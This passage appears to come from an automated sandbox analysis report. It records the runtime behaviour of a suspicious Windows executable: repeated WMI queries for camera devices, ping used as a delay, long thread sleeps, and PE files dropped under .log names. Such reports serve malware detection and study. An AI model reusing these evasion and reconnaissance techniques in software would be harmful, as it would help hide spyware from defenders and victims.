                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                        Uses ping.exe to sleep
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeMemory allocated: 1650000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeMemory allocated: 1B3B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeMemory allocated: 1B160000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 599860Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 598907Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 598594Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 3600000Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 598047Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 597782Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 597453Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 597313Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 597172Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 596860Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 596516Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 596032Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 595766Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 595485Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 595157Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 594860Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 594532Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 593891Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 593532Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 593313Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 593016Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 592719Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 592375Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 592106Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 591782Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 591594Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 591385Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 591047Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 590766Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 590578Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 590296Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 590032Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 589782Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 589375Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 589035Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 588797Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 588360Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 588078Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 587735Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 587547Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 587250Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 587031Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586869Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586762Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 300000Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586610Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586488Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586360Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586233Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586125Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586009Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585876Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585735Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585599Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585464Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585330Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585199Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585093Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584985Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584860Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584750Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584641Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584516Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584407Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584282Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584172Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584063Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583938Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583813Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583688Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583563Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583453Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583343Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583235Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583125Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWindow / User API: threadDelayed 5082Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeWindow / User API: threadDelayed 4458Jump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeDropped PE file which has not been started: C:\Users\user\Desktop\vJMbuDiW.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeDropped PE file which has not been started: C:\Users\user\Desktop\mezlGwgJ.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeDropped PE file which has not been started: C:\Users\user\Desktop\lhYdlwRP.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeDropped PE file which has not been started: C:\Users\user\Desktop\NWogOZDl.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeDropped PE file which has not been started: C:\Users\user\Desktop\wMTBqZlr.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeDropped PE file which has not been started: C:\Users\user\Desktop\bAJNFhyM.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeDropped PE file which has not been started: C:\Users\user\Desktop\YIOWuXMo.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeDropped PE file which has not been started: C:\Users\user\Desktop\wOXBumXW.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeDropped PE file which has not been started: C:\Users\user\Desktop\FsgregnE.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeDropped PE file which has not been started: C:\Users\user\Desktop\yXpCqrRs.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exe TID: 5052Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 6700Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -599860s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -598907s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -598594s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 3244Thread sleep time: -18000000s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -598047s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -597782s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -597453s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -597313s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -597172s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -596860s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -596516s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -596032s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -595766s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -595485s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -595157s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -594860s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -594532s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -593891s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -593532s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -593313s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -593016s >= -30000sJump to behavior
